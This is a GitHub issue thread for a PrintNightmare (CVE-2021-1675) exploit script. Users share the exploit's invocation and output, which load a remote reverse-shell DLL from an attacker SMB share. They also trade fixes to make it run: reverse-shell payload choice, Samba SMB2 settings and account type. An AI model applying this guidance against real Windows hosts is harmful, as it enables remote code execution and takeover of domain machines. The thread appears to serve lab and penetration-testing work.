Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Exploit runs but no execution/ Stuck on stage 0 #18

Open
pr0t0nus3rxyz opened this issue Jul 2, 2021 · 16 comments
Open

Exploit runs but no execution/ Stuck on stage 0 #18

pr0t0nus3rxyz opened this issue Jul 2, 2021 · 16 comments

Comments

@pr0t0nus3rxyz
Copy link

$ python .\CVE-2021-1675.py ignite.local/techuser:Pass123@10.10.10.156 "\10.10.10.155\share\meter.dll"
[] Try 1...
[] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[] Executing \10.10.10.155\share\meter.dll
[] Stage0: 0
[] Try 2...
[] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[] Executing \10.10.10.155\share\meter.dll
[] Stage0: 0
[] Try 3...
[] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[] Executing \10.10.10.155\share\meter.dll
[] Stage0: 0

Dll doesnt get executed
@pr0t0nus3rxyz
Copy link
Author

windows server 2016 and windows 10 pro

@andreluna
Copy link

Check if your dll reverse shell do running correct:
rundll32 meter.dll, Start

@WhiteHSBG
Copy link

same with you

@BlackSnufkin
Copy link

#19

@pr0t0nus3rxyz
Copy link
Author

Check if your dll reverse shell do running correct:
rundll32 meter.dll, Start

Yes working fine with rundll but not with RCE.

@korang
Copy link

korang commented Jul 4, 2021

I am having same issue. Windows Server 2019, it is a DC. The DLL is uploading , but not executing. When I try to run manually on server it executes fine.

@WhiteHSBG
Copy link

#19

Thanks this is very useful,I used windows/x64/meterpreter/reverse_tcp ,that's a mistake.

@citronneur
Copy link

See #25

@korang
Copy link

korang commented Jul 4, 2021

#19

Thanks this is very useful,I used windows/x64/meterpreter/reverse_tcp ,that's a mistake.

I have tried both meterpreter and shell with no execution.

@WhiteHSBG
Copy link

#19

Thanks this is very useful,I used windows/x64/meterpreter/reverse_tcp ,that's a mistake.

I have tried both meterpreter and shell with no execution.

try windows/x64/shell_reverse_tcp this payload

@korang
Copy link

korang commented Jul 4, 2021
edited

See #25

How do you know what driver to use?? Or what directory path to use?

@citronneur
Copy link

It’s just the name of the new driver, choose one randomly!

@citronneur
Copy link

Previously the exploit use « 1234 » as name, choose one you want!

@MPereira95
Copy link

Hello! I was having the same issue I think it's related to the SMB version that you are using. In my lab I had a windows server 2019 and it was using the SMB version 2, so I went to my kali's /etc/samba/smb.conf I added this line to the end of [global] :
min protocol = SMB2
Then I restarted nmbd and smbd service, ran the python script and was able to open a reverse shell.
Cheers!

@MPereira95
Copy link

Also created a low privilege user in my Windows server AD and used those credentials when executing the python script.

@zuchuanchengxuyuan
Copy link

you should not use administrator users

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
8 participants
@korang @andreluna @citronneur @WhiteHSBG @MPereira95 @BlackSnufkin @zuchuanchengxuyuan @pr0t0nus3rxyz